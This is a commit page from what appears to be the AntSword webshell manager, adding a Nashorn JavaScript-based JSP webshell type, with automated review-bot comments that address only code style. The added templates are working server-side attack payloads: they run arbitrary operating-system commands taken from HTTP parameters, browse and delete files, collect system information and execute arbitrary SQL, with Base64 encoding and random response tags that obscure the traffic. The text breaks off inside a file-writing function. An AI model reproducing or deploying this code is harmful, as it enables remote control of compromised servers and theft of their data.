Commit a6efa86f authored by yzddmr6's avatar yzddmr6

新增基于js引擎的jsp一句话类型

基于nashorn引擎,支持范围JDK>=8
parent ad8f443c
......@@ -174,6 +174,7 @@ antSword['encoders'] = (function () {
asp: [],
aspx: [],
jsp: [],
jsp_js: [],
php: [],
custom: []
};
......@@ -181,6 +182,7 @@ antSword['encoders'] = (function () {
asp: [],
aspx: [],
jsp: [],
jsp_js: [],
php: [],
custom: []
};
......@@ -189,7 +191,7 @@ antSword['encoders'] = (function () {
!fs.existsSync(userencoder_path) ?
fs.mkdirSync(userencoder_path) :
null;
['asp', 'aspx', 'php', 'jsp', 'custom'].map((t) => {
['asp', 'aspx', 'php', 'jsp', 'jsp_js','custom'].map((t) => {
!fs.existsSync(path.join(userencoder_path, `${t}`)) ?
fs.mkdirSync(path.join(userencoder_path, `${t}`)) :
null;
......@@ -230,6 +232,7 @@ antSword['decoders'] = (function () {
aspx: [],
php: [],
jsp: [],
jsp_js: [],
custom: []
};
var decoders_path = {
......@@ -237,6 +240,7 @@ antSword['decoders'] = (function () {
aspx: [],
php: [],
jsp: [],
jsp_js: [],
custom: []
};
let userdecoder_path = path.join(remote.process.env.AS_WORKDIR, 'antData/encoders');
......@@ -244,7 +248,7 @@ antSword['decoders'] = (function () {
!fs.existsSync(userdecoder_path) ?
fs.mkdirSync(userdecoder_path) :
null;
['asp', 'aspx', 'php', 'jsp', 'custom'].map((t) => {
['asp', 'aspx', 'php', 'jsp','jsp_js', 'custom'].map((t) => {
!fs.existsSync(path.join(userdecoder_path, `${t}`)) ?
fs.mkdirSync(path.join(userdecoder_path, `${t}`)) :
null;
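Review bot: The list of script types is now maintained by hand in several places: the `encoders`/`decoders` maps and both directory-creation arrays in these hunks, plus the `cores` array in `class Core`, which this commit edits separately to add `jsp_js`. A single shared constant such as `const SCRIPT_TYPES = ['asp', 'aspx', 'php', 'jsp', 'jsp_js', 'custom'];` (with `Core` appending its extra `php4`) would stop the copies from drifting apart. The directory setup also uses `.map()` and a ternary purely for side effects. `forEach` with a plain `if (!fs.existsSync(dir)) fs.mkdirSync(dir);` reads more clearly, and the spacing in `'jsp_js','custom'` and `'jsp','jsp_js'` should match the rest of the array. The enclosing functions start and end outside the hunks.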
......
......@@ -14,7 +14,7 @@ class Core {
constructor() {
// 加载子模块列表
let cores = {};
['php', 'asp', 'aspx', 'jsp', 'custom', 'php4'].map((_) => {
['php', 'asp', 'aspx', 'jsp','jsp_js', 'custom', 'php4'].map((_) => {
cores[_] = require(`./${_}/index`);
});
// 返回子模块对象
......
/**
* php::default解码器
*/
'use strict';
module.exports = {
/**
* @returns {string} asenc 加密返回数据的函数
*/
asoutput: () => {
return `function asoutput(str){
return str;
}
`.replace(/\n\s+/g, '');
},
/**
* 解码 Buffer
* @param {Buffer} buff 要被解码的 Buffer
* @returns {Buffer} 解码后的 Buffer
*/
decode_buff: (buff) => {
return buff;
}
}
\ No newline at end of file
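Review bot: The header comment reads `php::default解码器`, but the loader in the next file resolves `./jsp_js/decoder/${_}` with `decoders` returning `["default"]`, so this is presumably the jsp_js default decoder (the file path is not visible on this page). The header looks copied from the PHP decoder and should read `jsp_js::default decoder`. The `asoutput` JSDoc could also say that the returned string is an identity function, so the response body is passed through unchanged.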
/**
* JSP_JS服务端脚本模板
* 开写:2021/04/06
* 更新:-
* 作者:yzddMr6 <https://github.com/yzddmr6>
*/
'use strict';
const Base = require('../base');
class JSP_JS extends Base {
constructor(opts) {
super(opts);
// 解析模板
[
'base',
'command',
'filemanager',
'database/sqlserver',
'database/mysql',
'database/oracle'
].map((_) => {
this.parseTemplate(`./jsp_js/template/${_}`);
});
// 解析编码器
this
.encoders
.map((_) => {
this.parseEncoder(`./jsp_js/encoder/${_}`);
});
this
.decoders
.map((_) => {
this.parseDecoder(`./jsp_js/decoder/${_}`);
});
}
/**
* 获取编码器列表
* ? 可以在antSword.core.php.prototype.encoders中获取此变量
* @return {array} 编码器列表
*/
get encoders() {
return [];
}
get decoders() {
return ["default"];
}
/**
* HTTP请求数据组合函数
* @param {Object} data 通过模板解析后的代码对象
* @param {bool} force_default 强制使用 default 解码
* @return {Promise} 返回一个Promise操作对象
*/
complete(data, force_default = false) {
// 分隔符号
let tag_s, tag_e;
if (this.__opts__['otherConf'].hasOwnProperty('use-custom-datatag') && this.__opts__['otherConf']['use-custom-datatag'] == 1 && this.__opts__['otherConf']['custom-datatag-tags']) {
tag_s = this.__opts__['otherConf']['custom-datatag-tags'];
} else {
tag_s = Math.random().toString(16).substr(2, parseInt(Math.random() * 8 + 5)); // "->|";
}
if (this.__opts__['otherConf'].hasOwnProperty('use-custom-datatag') && this.__opts__['otherConf']['use-custom-datatag'] == 1 && this.__opts__['otherConf']['custom-datatag-tage']) {
tag_e = this.__opts__['otherConf']['custom-datatag-tage'];
} else {
tag_e = Math.random().toString(16).substr(2, parseInt(Math.random() * 8 + 5)); // "|<-";
}
let jspencode = this.__opts__['encode'];
switch (this.__opts__['encode']) {
case "UTF8":
jspencode = "UTF-8";
break;
default:
break;
}
let asencCode;
let ext = {
opts: this.__opts__,
};
if (!force_default) {
asencCode = this.__decoder__[this.__opts__['decoder'] || 'default'].asoutput(ext);
} else {
asencCode = this.__decoder__['default'].asoutput(ext);
}
// 组合完整的代码
let tmpCode = data['_'];
data['_'] = `
try {
load("nashorn:mozilla_compat.js");
} catch (e) {}
importPackage(Packages.java.util);
importPackage(Packages.java.lang);
importPackage(Packages.java.io);
var output = new StringBuffer("");
var cs = "${jspencode}";
var tag_s = "${tag_s}";
var tag_e = "${tag_e}";
try {
response.setContentType("text/html");
request.setCharacterEncoding(cs);
response.setCharacterEncoding(cs);
function decode(str) {
str=str.substr(#randomPrefix#);
return byte2Str(Base64DecodeToByte(str));
}
function Base64DecodeToByte(str) {
importPackage(Packages.sun.misc);
importPackage(Packages.java.util);
var bt;
try {
bt = new BASE64Decoder().decodeBuffer(str);
} catch (e) {
bt = Base64.getDecoder().decode(str);
}
return bt;
}
function byte2Str(bt) {
var strType = Java.type("java.lang.String");
var result = new strType(bt, cs);
return result;
}
${asencCode}
${tmpCode}
} catch (e) {
output.append("ERROR:// " + e.toString());
}
try {
response.getWriter().print(tag_s + asoutput(output.toString()) + tag_e);
} catch (e) {}
`.replace(/\n\s+/g, '').replace(/#randomPrefix#/g, this.__opts__.otherConf["random-Prefix"]);
// 使用编码器进行处理并返回
return this.encodeComplete(tag_s, tag_e, data);
}
}
module.exports = JSP_JS;
\ No newline at end of file
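Review bot: The JSDoc on the `encoders` getter still points to `antSword.core.php.prototype.encoders` and the `decoders` getter has no doc comment, so both look copied from the PHP core and should name `jsp_js`. The file header should also state the runtime assumption: the commit message gives the range as JDK >= 8, but the script built in `complete()` depends on Nashorn, which was removed from the JDK in version 15, so the documented range is wider than the code supports. On style, the three `.map()` calls in the constructor exist only for their side effects and would read better as `forEach`. The repeated `this.__opts__['otherConf'].hasOwnProperty(...) && ... == 1` test in `complete()` could be computed once into a local, using `Object.prototype.hasOwnProperty.call(otherConf, 'use-custom-datatag')` and strict comparison.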
/**
* 基础信息模板
* ? 获取系统信息、当前用户、当前路径、盘符列表
*/
module.exports = () => ({
info: {
_: `function SysInfoCode() {
var d = System.getProperty("user.dir");
var serverInfo = System.getProperty("os.name");
var user = System.getProperty("user.name");
var driverlist = WwwRootPathCode(d);
return d + "\t" + driverlist + "\t" + serverInfo + "\t" + user;
}
function WwwRootPathCode(d) {
var s = "";
if (!d.substring(0, 1).equals("/")) {
var roots = java.io.File.listRoots();
for (var i = 0; i < roots.length; i++) {
s += roots[i].toString().substring(0, 2) + "";
}
} else {
s += "/";
}
return s;
}
output.append(SysInfoCode());
`.replace(/\n\s+/g, '')
},
probedb: { // 检测数据库函数支持
_: `
function ProbedbCode() {
var drivers = [
"com.mysql.jdbc.Driver",
"com.mysql.cj.jdbc.Driver",
"oracle.jdbc.driver.OracleDriver",
"org.postgresql.Driver",
"weblogic.jdbc.mssqlserver4.Driver",
"com.microsoft.sqlserver.jdbc.SQLServerDriver",
"com.inet.pool.PoolDriver",
];
var ret = "";
for (var i = 0; i < drivers.length; i++) {
try {
Class.forName(drivers[i]);
ret += drivers[i] + "\\t1\\n";
} catch (e) {
ret += drivers[i] + "\\t0\\n";
}
}
return ret;
}
output.append(ProbedbCode());
`.replace(/\n\s+/g, '')
}
})
\ No newline at end of file
/**
* 虚拟终端命令执行
*/
module.exports = (arg1, arg2, arg3) => ({
exec: {
_: `
function ExecuteCommandCode(cmdPath, command, envstr) {
var sb = new StringBuffer();
var split = isWin() ? "/c" : "-c";
var s = [cmdPath, split, command];
var readonlyenv = System.getenv();
var cmdenv = new HashMap(readonlyenv);
var envs = envstr.split("\\\\|\\\\|\\\\|asline\\\\|\\\\|\\\\|");
for (var i = 0; i < envs.length; i++) {
var es = envs[i].split("\\\\|\\\\|\\\\|askey\\\\|\\\\|\\\\|");
if (es.length == 2) {
cmdenv.put(es[0], es[1]);
}
}
var e = [];
var i = 0;
for (var key in cmdenv) {
print(key + "=" + cmdenv[key]);
e[i] = key + "=" + cmdenv[key];
i++;
}
p = java.lang.Runtime.getRuntime().exec(s, e);
CopyInputStream(p.getInputStream(), sb);
CopyInputStream(p.getErrorStream(), sb);
return sb;
}
function CopyInputStream(is, sb) {
var l;
var br = new BufferedReader(new InputStreamReader(is, cs));
while ((l = br.readLine()) != null) {
sb.append(l + "\\r\\n");
}
br.close();
}
function isWin() {
var osname = System.getProperty("os.name");
osname = osname.toLowerCase();
return osname.startsWith("win");
}
var cmdPath = decode(request.getParameter("${arg1}"));
var command = decode(request.getParameter("${arg2}"));
var envstr = decode(request.getParameter("${arg3}"));
output.append(ExecuteCommandCode(cmdPath, command, envstr));
`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::bin}",
[arg2]: "#{newbase64::cmd}",
[arg3]: "#{newbase64::env}",
},
listcmd: {
_: `
function ListcmdCode(binarrstr) {
var binarr = binarrstr.split(",");
var ret = "";
for (var i = 0; i < binarr.length; i++) {
var f = new File(binarr[i]);
if (f.exists() && !f.isDirectory()) {
ret += binarr[i] + "\\t1\\n";
} else {
ret += binarr[i] + "\\t0\\n";
}
}
return ret;
}
var z1 = decode(request.getParameter("${arg1}"));
output.append(ListcmdCode(z1));
`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::binarr}",
},
});
//
// 默认代码模板
//
// @params
// :encode SHELL编码
// :conn 数据库连接字符串
// :sql 执行SQL语句
// :db 数据库名
// :table 表名
module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
show_databases: {
_: `
function executeSQL(encode, conn, sql, columnsep, rowsep, needcoluname) {
importPackage(Packages.java.sql);
var ret = "";
var x = conn.trim().replace("\\r\\n", "\\n").split("\\n");
Class.forName(x[0].trim());
var url = x[1] + "&characterEncoding=" + encode;
var c = DriverManager.getConnection(url);
var stmt = c.createStatement();
var rs = stmt.executeQuery(sql);
var rsmd = rs.getMetaData();
if (needcoluname) {
for (var i = 1; i <= rsmd.getColumnCount(); i++) {
var columnName = rsmd.getColumnName(i);
ret += columnName + columnsep;
}
ret += rowsep;
}
while (rs.next()) {
for (var i = 1; i <= rsmd.getColumnCount(); i++) {
var columnValue = rs.getString(i);
ret += columnValue + columnsep;
}
ret += rowsep;
}
return ret;
}
function showDatabases(encode, conn) {
var sql = "show databases";
var columnsep = "\\t";
var rowsep = "";
return executeSQL(encode, conn, sql, columnsep, rowsep, false);
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
output.append(showDatabases(z1, z2));
`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::encode}",
[arg2]: "#{newbase64::conn}",
},
show_tables: {
_: `
function executeSQL(encode, conn, sql, columnsep, rowsep, needcoluname) {
importPackage(Packages.java.sql);
var ret = "";
var x = conn.trim().replace("\\r\\n", "\\n").split("\\n");
Class.forName(x[0].trim());
var url = x[1] + "&characterEncoding=" + encode;
var c = DriverManager.getConnection(url);
var stmt = c.createStatement();
var rs = stmt.executeQuery(sql);
var rsmd = rs.getMetaData();
if (needcoluname) {
for (var i = 1; i <= rsmd.getColumnCount(); i++) {
var columnName = rsmd.getColumnName(i);
ret += columnName + columnsep;
}
ret += rowsep;
}
while (rs.next()) {
for (var i = 1; i <= rsmd.getColumnCount(); i++) {
var columnValue = rs.getString(i);
ret += columnValue + columnsep;
}
ret += rowsep;
}
return ret;
}
function showTables(encode, conn, dbname) {
var sql = "show tables from " + dbname;
var columnsep = "\\t";
var rowsep = "";
return executeSQL(encode, conn, sql, columnsep, rowsep, false);
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
var z3 = decode(request.getParameter("${arg3}"));
output.append(showTables(z1, z2, z3));
`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::encode}",
[arg2]: "#{newbase64::conn}",
[arg3]: "#{newbase64::db}",
},
show_columns: {
_: `
function executeSQL(encode, conn, sql, columnsep, rowsep, needcoluname) {
importPackage(Packages.java.sql);
var ret = "";
var x = conn.trim().replace("\\r\\n", "\\n").split("\\n");
Class.forName(x[0].trim());
var url = x[1] + "&characterEncoding=" + encode;
var c = DriverManager.getConnection(url);
var stmt = c.createStatement();
var rs = stmt.executeQuery(sql);
var rsmd = rs.getMetaData();
if (needcoluname) {
for (var i = 1; i <= rsmd.getColumnCount(); i++) {
var columnName = rsmd.getColumnName(i);
ret += columnName + columnsep;
}
ret += rowsep;
}
while (rs.next()) {
for (var i = 1; i <= rsmd.getColumnCount(); i++) {
var columnValue = rs.getString(i);
ret += columnValue + columnsep;
}
ret += rowsep;
}
return ret;
}
function showColumns(encode, conn, dbname, table) {
var columnsep = "\\t";
var rowsep = "";
var sql = "select * from " + dbname + "." + table + " limit 0,0";
return executeSQL(encode, conn, sql, columnsep, rowsep, true);
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
var z3 = decode(request.getParameter("${arg3}"));
var z4 = decode(request.getParameter("${arg4}"));
output.append(showColumns(z1, z2, z3, z4));
`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::encode}",
[arg2]: "#{newbase64::conn}",
[arg3]: "#{newbase64::db}",
[arg4]: "#{newbase64::table}",
},
query: {
_: `
function Base64Encode(str) {
importPackage(Packages.sun.misc);
importPackage(Packages.java.util);
var ret = "";
try {
ret = new Base64().getEncoder().encodeToString(str.getBytes());
} catch (e) {
ret = new BASE64Encoder().encode(str.getBytes());
}
ret = ret.replaceAll("\\r|\\n", "");
return ret;
}
function executeSQL(encode, conn, sql, columnsep, rowsep, needcoluname) {
importPackage(Packages.java.sql);
var ret = "";
var x = conn.trim().replace("\\r\\n", "\\n").split("\\n");
Class.forName(x[0].trim());
var url = x[1] + "&characterEncoding=" + encode;
var c = DriverManager.getConnection(url);
var stmt = c.createStatement();
var isRS = stmt.execute(sql);
if (isRS) {
var rs = stmt.getResultSet();
var rsmd = rs.getMetaData();
if (needcoluname) {
for (var i = 1; i <= rsmd.getColumnCount(); i++) {
var columnName = rsmd.getColumnName(i);
ret += columnName + columnsep;
}
ret += rowsep;
}
while (rs.next()) {
for (var i = 1; i <= rsmd.getColumnCount(); i++) {
var columnValue = rs.getString(i);
ret += Base64Encode(columnValue) + columnsep;
}
ret += rowsep;
}
} else {
ret += "Result" + columnsep + rowsep;
var rowCount = stmt.getUpdateCount();
if (rowCount > 0) {
ret += Base64Encode("Rows changed = " + rowCount) + columnsep + rowsep;
} else if (rowCount == 0) {
ret +=
Base64Encode("No rows changed or statement was DDL command") +
columnsep +
rowsep;
} else {
ret += Base64Encode("False") + columnsep + rowsep;
}
}
return ret;
}
function query(encode, conn, sql) {
var columnsep = "\\t|\\t";
var rowsep = "\\r\\n";
return executeSQL(encode, conn, sql, columnsep, rowsep, true);
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
var z3 = decode(request.getParameter("${arg3}"));
output.append(query(z1, z2, z3));
`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::encode}",
[arg2]: "#{newbase64::conn}",
[arg3]: "#{newbase64::sql}",
},
});
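Review bot: `executeSQL` is pasted verbatim into `show_databases`, `show_tables` and `show_columns` here, and again with a different connection call in the oracle and sqlserver template files that follow, so any later change has to be repeated across about a dozen string literals. Hoisting the shared text into one module-level template constant and interpolating it into each `_` entry would remove the duplication. The exported arrow function also declares `arg5` and `arg6`, which no entry uses. The header comment lists `:encode`, `:conn`, `:sql`, `:db` and `:table` without saying which `argN` carries which, so a line such as `// arg1=encode, arg2=conn, arg3=db (sql for query), arg4=table` would document the mapping.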
//
// oracle 模板
//
// @params
// :encode SHELL编码
// :conn 数据库连接字符串
// :sql 执行SQL语句
// :db 数据库名
// :table 表名
module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
show_databases: {
_: `
function executeSQL(encode, conn, sql, columnsep, rowsep, needcoluname) {
importPackage(Packages.java.sql);
var ret = "";
var x = conn.trim().replace("\\r\\n", "\\n").split("\\n");
Class.forName(x[0].trim());
var url = x[1];
var c = DriverManager.getConnection(url, x[2], x[3]);
var stmt = c.createStatement();
var rs = stmt.executeQuery(sql);
var rsmd = rs.getMetaData();
if (needcoluname) {
for (var i = 1; i <= rsmd.getColumnCount(); i++) {
var columnName = rsmd.getColumnName(i);
ret += columnName + columnsep;
}
ret += rowsep;
}
while (rs.next()) {
for (var i = 1; i <= rsmd.getColumnCount(); i++) {
var columnValue = rs.getString(i);
ret += columnValue + columnsep;
}
ret += rowsep;
}
return ret;
}
function showDatabases(encode, conn) {
var sql = "SELECT USERNAME FROM ALL_USERS ORDER BY 1";
var columnsep = "\\t";
var rowsep = "";
return executeSQL(encode, conn, sql, columnsep, rowsep, false);
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
output.append(showDatabases(z1, z2));`,
[arg1]: '#{newbase64::encode}',
[arg2]: '#{newbase64::conn}'
},
show_tables: {
_: `
function executeSQL(encode, conn, sql, columnsep, rowsep, needcoluname) {
importPackage(Packages.java.sql);
var ret = "";
var x = conn.trim().replace("\\r\\n", "\\n").split("\\n");
Class.forName(x[0].trim());
var url = x[1];
var c = DriverManager.getConnection(url, x[2], x[3]);
var stmt = c.createStatement();
var rs = stmt.executeQuery(sql);
var rsmd = rs.getMetaData();
if (needcoluname) {
for (var i = 1; i <= rsmd.getColumnCount(); i++) {
var columnName = rsmd.getColumnName(i);
ret += columnName + columnsep;
}
ret += rowsep;
}
while (rs.next()) {
for (var i = 1; i <= rsmd.getColumnCount(); i++) {
var columnValue = rs.getString(i);
ret += columnValue + columnsep;
}
ret += rowsep;
}
return ret;
}
function showTables(encode, conn, dbname) {
var sql =
"SELECT TABLE_NAME FROM (SELECT TABLE_NAME FROM ALL_TABLES WHERE OWNER='" +
dbname +
"' ORDER BY 1)";
var columnsep = "\\t";
var rowsep = "";
return executeSQL(encode, conn, sql, columnsep, rowsep, false);
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
var z3 = decode(request.getParameter("${arg3}"));
output.append(showTables(z1, z2, z3));`,
[arg1]: '#{newbase64::encode}',
[arg2]: '#{newbase64::conn}',
[arg3]: '#{newbase64::db}'
},
show_columns: {
_: `function executeSQL(encode, conn, sql, columnsep, rowsep, needcoluname) {
importPackage(Packages.java.sql);
var ret = "";
var x = conn.trim().replace("\\r\\n", "\\n").split("\\n");
Class.forName(x[0].trim());
var url = x[1];
var c = DriverManager.getConnection(url, x[2], x[3]);
var stmt = c.createStatement();
var rs = stmt.executeQuery(sql);
var rsmd = rs.getMetaData();
if (needcoluname) {
for (var i = 1; i <= rsmd.getColumnCount(); i++) {
var columnName = rsmd.getColumnName(i);
ret += columnName + columnsep;
}
ret += rowsep;
}
while (rs.next()) {
for (var i = 1; i <= rsmd.getColumnCount(); i++) {
var columnValue = rs.getString(i);
ret += columnValue + columnsep;
}
ret += rowsep;
}
return ret;
}
function showColumns(encode, conn, dbname, table) {
var columnsep = "\\t";
var rowsep = "";
var sql = "select * from " + dbname + "." + table + " WHERE ROWNUM=0";
return executeSQL(encode, conn, sql, columnsep, rowsep, true);
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
var z3 = decode(request.getParameter("${arg3}"));
var z4 = decode(request.getParameter("${arg4}"));
output.append(showColumns(z1, z2, z3, z4));`,
[arg1]: '#{newbase64::encode}',
[arg2]: '#{newbase64::conn}',
[arg3]: '#{newbase64::db}',
[arg4]: '#{newbase64::table}'
},
query: {
_: `
function Base64Encode(str) {
importPackage(Packages.sun.misc);
importPackage(Packages.java.util);
var ret = "";
try {
ret = new Base64().getEncoder().encodeToString(str.getBytes());
} catch (e) {
ret = new BASE64Encoder().encode(str.getBytes());
}
ret = ret.replaceAll("\\r|\\n", "");
return ret;
}
function executeSQL(encode, conn, sql, columnsep, rowsep, needcoluname) {
importPackage(Packages.java.sql);
var ret = "";
var x = conn.trim().replace("\\r\\n", "\\n").split("\\n");
Class.forName(x[0].trim());
var url = x[1];
var c = DriverManager.getConnection(url, x[2], x[3]);
var stmt = c.createStatement();
var isRS = stmt.execute(sql);
if (isRS) {
var rs = stmt.getResultSet();
var rsmd = rs.getMetaData();
if (needcoluname) {
for (var i = 1; i <= rsmd.getColumnCount(); i++) {
var columnName = rsmd.getColumnName(i);
ret += columnName + columnsep;
}
ret += rowsep;
}
while (rs.next()) {
for (var i = 1; i <= rsmd.getColumnCount(); i++) {
var columnValue = rs.getString(i);
ret += Base64Encode(columnValue) + columnsep;
}
ret += rowsep;
}
} else {
ret += "Result" + columnsep + rowsep;
var rowCount = stmt.getUpdateCount();
if (rowCount > 0) {
ret += Base64Encode("Rows changed = " + rowCount) + columnsep + rowsep;
} else if (rowCount == 0) {
ret +=
Base64Encode("No rows changed or statement was DDL command") +
columnsep +
rowsep;
} else {
ret += Base64Encode("False") + columnsep + rowsep;
}
}
return ret;
}
function query(encode, conn, sql) {
var columnsep = "\\t|\\t";
var rowsep = "\\r\\n";
return executeSQL(encode, conn, sql, columnsep, rowsep, true);
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
var z3 = decode(request.getParameter("${arg3}"));
output.append(query(z1, z2, z3));`,
[arg1]: '#{newbase64::encode}',
[arg2]: '#{newbase64::conn}',
[arg3]: '#{newbase64::sql}'
}
})
\ No newline at end of file
//
// sqlserver 代码模板
//
// @params
// :encode SHELL编码
// :conn 数据库连接字符串
// :sql 执行SQL语句
// :db 数据库名
// :table 表名
module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
show_databases: {
_: `
function executeSQL(encode, conn, sql, columnsep, rowsep, needcoluname) {
importPackage(Packages.java.sql);
var ret = "";
var x = conn.trim().replace("\\r\\n", "\\n").split("\\n");
Class.forName(x[0].trim());
var url = x[1];
var c = DriverManager.getConnection(url);
var stmt = c.createStatement();
var rs = stmt.executeQuery(sql);
var rsmd = rs.getMetaData();
if (needcoluname) {
for (var i = 1; i <= rsmd.getColumnCount(); i++) {
var columnName = rsmd.getColumnName(i);
ret += columnName + columnsep;
}
ret += rowsep;
}
while (rs.next()) {
for (var i = 1; i <= rsmd.getColumnCount(); i++) {
var columnValue = rs.getString(i);
ret += columnValue + columnsep;
}
ret += rowsep;
}
return ret;
}
function showDatabases(encode, conn) {
var sql = "select [name] from master.dbo.sysdatabases order by 1";
var columnsep = "\\t";
var rowsep = "";
return executeSQL(encode, conn, sql, columnsep, rowsep, false);
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
output.append(showDatabases(z1, z2));`,
[arg1]: '#{newbase64::encode}',
[arg2]: '#{newbase64::conn}'
},
show_tables: {
_: `
function executeSQL(encode, conn, sql, columnsep, rowsep, needcoluname) {
importPackage(Packages.java.sql);
var ret = "";
var x = conn.trim().replace("\\r\\n", "\\n").split("\\n");
Class.forName(x[0].trim());
var url = x[1];
var c = DriverManager.getConnection(url);
var stmt = c.createStatement();
var rs = stmt.executeQuery(sql);
var rsmd = rs.getMetaData();
if (needcoluname) {
for (var i = 1; i <= rsmd.getColumnCount(); i++) {
var columnName = rsmd.getColumnName(i);
ret += columnName + columnsep;
}
ret += rowsep;
}
while (rs.next()) {
for (var i = 1; i <= rsmd.getColumnCount(); i++) {
var columnValue = rs.getString(i);
ret += columnValue + columnsep;
}
ret += rowsep;
}
return ret;
}
function showTables(encode, conn, dbname) {
var sql = "SELECT [name] FROM sysobjects WHERE xtype='U' ORDER BY 1";
var columnsep = "\\t";
var rowsep = "";
return executeSQL(encode, conn, sql, columnsep, rowsep, false);
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
var z3 = decode(request.getParameter("${arg3}"));
output.append(showTables(z1, z2, z3));`,
[arg1]: '#{newbase64::encode}',
[arg2]: '#{newbase64::conn}',
[arg3]: '#{newbase64::db}'
},
show_columns: {
_: `function executeSQL(encode, conn, sql, columnsep, rowsep, needcoluname) {
importPackage(Packages.java.sql);
var ret = "";
var x = conn.trim().replace("\\r\\n", "\\n").split("\\n");
Class.forName(x[0].trim());
var url = x[1];
var c = DriverManager.getConnection(url);
var stmt = c.createStatement();
var rs = stmt.executeQuery(sql);
var rsmd = rs.getMetaData();
if (needcoluname) {
for (var i = 1; i <= rsmd.getColumnCount(); i++) {
var columnName = rsmd.getColumnName(i);
ret += columnName + columnsep;
}
ret += rowsep;
}
while (rs.next()) {
for (var i = 1; i <= rsmd.getColumnCount(); i++) {
var columnValue = rs.getString(i);
ret += columnValue + columnsep;
}
ret += rowsep;
}
return ret;
}
function showColumns(encode, conn, dbname, table) {
var columnsep = "\\t";
var rowsep = "";
var sql = "SELECT TOP 1 * FROM " + dbname + "." + table;
return executeSQL(encode, conn, sql, columnsep, rowsep, true);
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
var z3 = decode(request.getParameter("${arg3}"));
var z4 = decode(request.getParameter("${arg4}"));
output.append(showColumns(z1, z2, z3, z4));`,
[arg1]: '#{newbase64::encode}',
[arg2]: '#{newbase64::conn}',
[arg3]: '#{newbase64::db}',
[arg4]: '#{newbase64::table}'
},
query: {
_: `
function Base64Encode(str) {
importPackage(Packages.sun.misc);
importPackage(Packages.java.util);
var ret = "";
try {
ret = new Base64().getEncoder().encodeToString(str.getBytes());
} catch (e) {
ret = new BASE64Encoder().encode(str.getBytes());
}
ret = ret.replaceAll("\\r|\\n", "");
return ret;
}
function executeSQL(encode, conn, sql, columnsep, rowsep, needcoluname) {
importPackage(Packages.java.sql);
var ret = "";
var x = conn.trim().replace("\\r\\n", "\\n").split("\\n");
Class.forName(x[0].trim());
var url = x[1];
var c = DriverManager.getConnection(url);
var stmt = c.createStatement();
var isRS = stmt.execute(sql);
if (isRS) {
var rs = stmt.getResultSet();
var rsmd = rs.getMetaData();
if (needcoluname) {
for (var i = 1; i <= rsmd.getColumnCount(); i++) {
var columnName = rsmd.getColumnName(i);
ret += columnName + columnsep;
}
ret += rowsep;
}
while (rs.next()) {
for (var i = 1; i <= rsmd.getColumnCount(); i++) {
var columnValue = rs.getString(i);
ret += Base64Encode(columnValue) + columnsep;
}
ret += rowsep;
}
} else {
ret += "Result" + columnsep + rowsep;
var rowCount = stmt.getUpdateCount();
if (rowCount > 0) {
ret += Base64Encode("Rows changed = " + rowCount) + columnsep + rowsep;
} else if (rowCount == 0) {
ret +=
Base64Encode("No rows changed or statement was DDL command") +
columnsep +
rowsep;
} else {
ret += Base64Encode("False") + columnsep + rowsep;
}
}
return ret;
}
function query(encode, conn, sql) {
var columnsep = "\\t|\\t";
var rowsep = "\\r\\n";
return executeSQL(encode, conn, sql, columnsep, rowsep, true);
}
var z1 = decode(request.getParameter("${arg1}"));
var z2 = decode(request.getParameter("${arg2}"));
var z3 = decode(request.getParameter("${arg3}"));
output.append(query(z1, z2, z3));`,
[arg1]: '#{newbase64::encode}',
[arg2]: '#{newbase64::conn}',
[arg3]: '#{newbase64::sql}'
}
})
\ No newline at end of file
/**
* 文件管理模板
*/
module.exports = (arg1, arg2, arg3) => ({
dir: {
_: `
function FileTreeCode(dirPath) {
var oF = new File(dirPath);
var l = oF.listFiles();
var s = "", sT, sQ, sF = "";
var dt;
var fm = new java.text.SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
for (var i = 0; i < l.length; i++) {
dt = new java.util.Date(l[i].lastModified());
sT = fm.format(dt);
sQ = l[i].canRead() ? "R" : "-";
sQ += l[i].canWrite() ? "W" : "-";
try {
sQ += l[i].getClass().getMethod("canExecute").invoke(l[i]) ? "X" : "-";
}catch (e) {
sQ += "-";
}
var nm = l[i].getName();
if (l[i].isDirectory()) {
s += nm + "/\t" + sT + "\t" + l[i].length() + "\t" + sQ + "\\n";
} else {
sF += nm + "\t" + sT + "\t" + l[i].length() + "\t" + sQ + "\\n";
}
}
s += sF;
return s;
}
var dirPath=decode(request.getParameter("${arg1}"));
output.append(FileTreeCode(dirPath));
`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::path}",
},
delete: {
_: `
function DeleteFileOrDirCode(fileOrDirPath) {
var f = new File(fileOrDirPath);
if (f.isDirectory()) {
var x = f.listFiles();
for (var k = 0; k < x.length; k++) {
if (!x[k].delete()) {
DeleteFileOrDirCode(x[k].getPath());
}
}
}
f.delete();
return "1";
}
var fileOrDirPath = decode(request.getParameter("${arg1}"));
output.append(DeleteFileOrDirCode(fileOrDirPath));
`.replace(/\n\s+/g, ""),
[arg1]: "#{newbase64::path}",
},
create_file: {
_: `
function WriteFileCode(filePath, fileContext) {
var h = "0123456789ABCDEF";
